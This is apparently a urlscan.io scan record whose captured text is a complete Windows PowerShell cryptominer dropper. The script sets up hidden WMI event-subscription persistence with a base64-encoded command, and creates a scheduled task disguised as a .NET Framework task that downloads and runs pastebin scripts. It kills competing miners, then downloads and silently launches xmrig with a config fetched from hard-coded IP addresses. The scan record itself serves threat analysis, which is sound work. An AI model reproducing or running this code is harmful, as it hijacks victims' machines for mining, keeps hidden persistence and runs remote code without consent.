urlscan.io logo urlscan.io
SecurityTrails logo

27.1.1.34 Open in urlscan Pro
27.1.1.34  Public Scan

Back to summary
URL: http://27.1.1.34:8080/docs/cgi/wi.txt
Submission: On August 03 via manual from DE — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Eventlogers'} |Remove-WmiObject
$current=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name -replace "((.*)\\)", ""
if([System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Contains("SYSTEM")){
Try {
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Eventlogers'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Eventlogers'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%subscription%'" | Remove-WmiObject -Verbose
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Eventlogers'} |Remove-WmiObject
$filterName = 'Eventlogers'
$consumerName = 'Eventlogers'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$Arg =@{
        Name=$consumerName
            CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe  -NonInteractive -windowstyle hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBGADcAZQBDAEcATABRAFUAJwApAA=="
}
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
}
Catch {
}
}
Else{
schtasks /create /sc MINUTE /mo 5 /tn  "\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32" /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''https://pastebin.com/raw/V5WR8U2t'''))'"  /F /ru System
}
Function Killer {

    # Remove known miners by services names
    $SrvName = "dom_miner", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "cli_optimization_v2.0.55727_64","cli_optimization_v2.0.55727_32","Oracle Java System Service","Oracle Java System Services",
    "Sougoudl", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","aspnet_state"
    foreach ($Srv in $SrvName) {

        #		Set-Service -Name $Srv -StartupType Disabled -ErrorAction SilentlyContinue

        #		Stop-Service -Name $Srv -Force -ErrorAction SilentlyContinue

        $Null = SC.exe Config $Srv Start= Disabled
        $Null = SC.exe Stop $Srv
        $Null = SC.exe Delete $Srv
    }

    # Remove known miners by scheduled tasks names
    $TaskName = "dsm", "dom", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","\Microsoft\Windows\Bluetooth\UpdateDeviceTask","\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization",
    "\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.50319 Critical","\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678156-433529325-2142214268-1138","\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-433529325-2142214968-1138","\Microsoft\Windows\DiskCleanup\SlientDefragDisks","\Microsoft\Windows\EDP\EDP App Lock Task","\Microsoft\Windows\EDP\EDP App Update Cache",
    "\Microsoft\Windows\MobilePC\DetectPC","\Microsoft\Windows\UPnP\UPnPHost","\Microsoft\Windows\UPnP\UPnPClient","\Microsoft\Windows\Shell\WinShell","\Microsoft\Windows\MUI\LPupdate","\Microsoft\Windows\DiskDiagnostic\Microsoft Windows Disk Diagnostic","\Microsoft\Windows\Shell\WindowsShellUpdate",
    "Oracle Products Reporter", "Update service for  products", "Update service for Oracle productsm", "Update service for Windows Service", "oka", "my1", "MicrosoftsWindowsy", "UAC", "Update service for Oracle productsoo","Microsoft .NET Framework NGEN v2.0.55727_x32"

    foreach ($Task in $TaskName) {
        SchTasks.exe /Delete /TN $Task /F 2> $Null
    }
	
    # Terminates and removes miners by indicative command line arguments
    $CmdLine = Get-WmiObject -Class Win32_Process | Where-Object {
        $_.CommandLine -like '*pool.monero.hashvault.pro*' -Or $_.CommandLine -like '*blazepool*' -Or $_.CommandLine -like '*blockmasters*' -Or $_.CommandLine -like '*blockmasterscoins*' -Or $_.CommandLine -like '*bohemianpool*' -Or $_.CommandLine -like '*cryptmonero*' -Or $_.CommandLine -like '*cryptonight*' -Or $_.CommandLine -like '*crypto-pool*' -Or $_.CommandLine -like '*--donate-level*' -Or $_.CommandLine -like '*dwarfpool*' -Or $_.CommandLine -like '*hashrefinery*' -Or $_.CommandLine -like '*hashvault.pro*' -Or $_.CommandLine -like '*iwanttoearn.money*' -Or $_.CommandLine -like '*--max-cpu-usage*' -Or $_.CommandLine -like '*mine.bz*' -Or $_.CommandLine -like '*minercircle.com*' -Or $_.CommandLine -like '*minergate*' -Or $_.CommandLine -like '*miners.pro*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*minexmr*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*miningpoolhubcoins*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero.lindon-pool.win*' -Or $_.CommandLine -like '*moriaxmr.com*' -Or $_.CommandLine -like '*mypool.online*' -Or $_.CommandLine -like '*nanopool.org*' -Or $_.CommandLine -like '*nicehash*' -Or $_.CommandLine -like '*-p x*' -Or $_.CommandLine -like '*pool.electroneum.hashvault.pro*' -Or $_.CommandLine -like '*pool.xmr*' -Or $_.CommandLine -like '*poolto.be*' -Or $_.CommandLine -like '*prohash*' -Or $_.CommandLine -like '*prohash.net*' -Or $_.CommandLine -like '*ratchetmining.com*' -Or $_.CommandLine -like '*slushpool*' -Or $_.CommandLine -like '*stratum+*' -Or $_.CommandLine -like '*suprnova.cc*' -Or $_.CommandLine -like '*teracycle.net*' -Or $_.CommandLine -like '*usxmrpool*' -Or $_.CommandLine -like '*viaxmr.com*' -Or $_.CommandLine -like '*xmrpool*' -Or $_.CommandLine -like '*yiimp*' -Or $_.CommandLine -like '*zergpool*' -Or $_.CommandLine -like '*zergpoolcoins*' -Or $_.CommandLine -like '*zpool*'
    }
	
    if ($CmdLine -ne $Null) {
        $PathArray = @()
        foreach ($m in $CmdLine) {
            $evid = $($m.ProcessId)
            # The line below is wasn't originally commented, it white-lists the miner itself
            # if (($evid -eq $PId) -or ($evid -eq $minerPId)) { continue }
            Write-Host "[i] Miner PId: $evid"
            Get-Process -Id $evid | Stop-Process -Force

            # Create an array of competing miners' paths to remove
            $Path = $($m.Path)
            if ($Path -eq "$Env:WinDir\System32\cmd.exe" -Or $Path -eq "$Env:WinDir\SysWOW64\cmd.exe" -Or $Path -eq "$Env:WinDir\Explorer.exe" -Or $Path -eq "$Env:WinDir\Notepad.exe") { continue }
            if ($PathArray -NotContains $Path) { $PathArray += $Path }
        }
    }	
    # Uses netstat to list all "ESTABLISHED" connections
    # Afterwards it filters lines containing ports associated with miners and terminates the process using it
    [array]$psids = Get-Process -Name PowerShell | Sort CPU -Descending | ForEach-Object {$_.Id}
    $tcpconn = NetStat -anop TCP
    if ($psids -ne $null) {
        foreach ($t in $tcpconn) {
            $line = $t.split(' ')| ? {$_}
            if ($line -eq $null) { continue }
            if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":13333 ") -or $t.contains(":443 ") -or $t.contains(":1111") -or $t.contains(":2222") -or $t.contains(":4444") -or $t.contains(":5555") -or $t.contains(":6666") -or $t.contains(":7777") -or $t.contains(":8888") -or $t.contains(":9999") -or $t.contains(":14433") -or $t.contains(":14444") -or $t.contains(":45560") -or $t.contains(":65333"))) {
                $evid = $line[-1]
				
                # The line below is wasn't originally commented, it white-lists the miner itself
                # if (($evid -eq $PId) -or ($evid -eq $minerPId)) { continue }
                Write-Host "[i] Miner PId: $evid"
                Get-Process -Id $evid | Stop-Process -Force
            }
        }
    }

    # Uses netstat to list all "ESTABLISHED" connections
    # Afterwards it lists processes connecting to remote ports associated with miners and terminates it
    foreach ($t in $tcpconn) {
        $line = $t.split(' ')| ? {$_}
        if (!($line -is [array])) { continue }
		
        if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111")	-or $line[-3].contains(":2222") -or $line[-3].contains(":13333") -or $line[-3].contains(":4444")	-or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":6633") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9980") -or $line[-3].contains(":9999") -or $line[-3].contains(":13333") -or $line[-3].contains(":14433") -or $line[-3].contains(":14444") -or $line[-3].contains(":16633") -or $line[-3].contains(":16666") -or $line[-3].contains(":45560") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335") -or $line[-3].contains(":5790"))) {
            $evid = $line[-1]
            # The line below is wasn't originally commented, it white-lists the miner itself
            # if (($evid -eq $PId) -or ($evid -eq $minerPId)) { continue }
            Write-Host "[i] Miner PId: $evid"
            Get-Process -Id $evid | Stop-Process -Force
        }
    }

    # Remove known miners by known process names
    $Miner = "LogBack", "xmrig*", "minerd", "svhostd", "notepad", "dom", "upgeade", "auto-upgeade", "svshost","pythonhs", "helper", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost","kmkww","taskhostex",
    "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "dsm", "kkrrr", 'kkwsx', "sysupdate", "wxm", "GoogleServer", "wmice", 'windown', "SystemManagement","checked1", "networkservice", "pythonww", 
    "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","xdxd","pythonhs","network02"
	
    foreach ($m in $Miner) {
        Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force
    }
}
Killer
cmd /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\javae.exe /f
cmd.exe /c del /f /q C:\Windows\temp\wxm.exe
cmd.exe /c mkdir C:\Windows\temp\wxm.exe
cmd.exe /c del /f /q C:\Windows\temp\LogBack.exe
cmd.exe /c del /f /q C:\Windows\temp\svhostd.exe
cmd.exe /c mkdir C:\Windows\temp\LogBack.exe
cmd.exe /c del /f /q C:\ProgramData\Oracle\Java\java.exe
cmd.exe /c mkdir C:\Windows\temp\svhostd.exe
cmd.exe /c rd /s /q C:\ProgramData\Oracle\Java\.oracle_jre_usage
cmd.exe /c mkdir C:\ProgramData\Oracle\Java\.oracle_jre_usage\java.exe
cmd.exe /c attrib -s -h -r %tmp%\sysupdate.exe
cmd.exe /c attrib -s -h -r %temp%\sysupdate.exe
cmd.exe /c del /f /q %tmp%\sysupdate.exe
cmd.exe /c mkdir %tmp%\sysupdate.exe
cmd.exe /c md %tmp%\sysupdate.exe
cmd.exe /c mkdir %temp%\sysupdate.exe
cmd.exe /c md %temp%\sysupdate.exe
cmd.exe /c attrib +s +h +r %tmp%\sysupdate.exe
cmd.exe /c attrib +s +h +r %temp%\sysupdate.exe
$ne = $MyInvocation.MyCommand.Path
$miner_url = "http://182.237.104.13:8081/xmrig.exe"
$miner_name = "javae"
$miner_cfg_url = "http://27.1.1.34:8080/docs/cgi/config.json"
$miner_cfg_name = "config.json"
$killmodule_url = "http://27.1.1.34:8080/examples/clean.bat"
$killmodule_name = "clean.bat"
$miner_path = "$env:TMP\javae.exe"
$miner_cfg_path = "$env:TMP\config.json"
$killmodule_path = "$env:TMP\clean.bat"
function Update($url,$path,$proc_name)
 {        
    Get-Process -Name $proc_name | Stop-Process
    Remove-Item $path
    Try {
        $vc = New-Object System.Net.WebClient
        $vc.DownloadFile($url,$path)
    }
    Catch {
        Write-Output "donwload with backurl"
    }
}

if((Test-Path $killmodule_path))
{
	Update $killmodule_url $killmodule_path $killmodule_name
}
else {
    Write-Output "download clean fail"
}

if(!(Get-Process $miner_name -ErrorAction SilentlyContinue)) 
{
    cmd.exe /c attrib -s -h -r %tmp%\config.json
    cmd.exe /c attrib -s -h -r C:\Windows\temp\config.json
    cmd.exe /c rd /s /q %tmp%\config.json
    cmd.exe /c rd /s /q C:\Windows\temp\config.json
    wmic process where "ExecutablePath like 'c:\\windows\\temp\\%'" delete
    wmic process where "ExecutablePath like 'C:\\Users\\Administrator\\AppData\\Local\\Temp\\%'" delete
    wmic process where "ExecutablePath like 'C:\\Users\\$current\\AppData\\Local\\Temp\\%'" delete
    Update $miner_url $miner_path $miner_name
    Update $miner_cfg_url $miner_cfg_path $miner_cfg_name
    cmd.exe /c attrib +R +S +H %tmp%\config.json
    cmd.exe /c attrib +R +S +H C:\Windows\temp\config.json
	Start-Process $miner_path -windowstyle hidden
}
else 
{
	Write-Output "Miner Running"
}
wmic process where "ExecutablePath like 'C:\\Windows\\Fonts\\%'" delete
wmic process where "ExecutablePath like 'C:\\Windows\\SysWOW64\\%'" delete
wmic process where "ExecutablePath like 'C:\\ProgramData\\Oracle\\Java\\%'" delete
wmic process where "ExecutablePath like 'C:\\Windows\\Microsoft.NET\\Framework64\\%'" delete
wmic process where "ExecutablePath like 'C:\\ProgramData\\nTNLLnvWzl\\%'" delete
Start-Process cmd.exe "/c $killmodule_path" -windowstyle hidden
cmd /c taskkill /f /im powershell.exe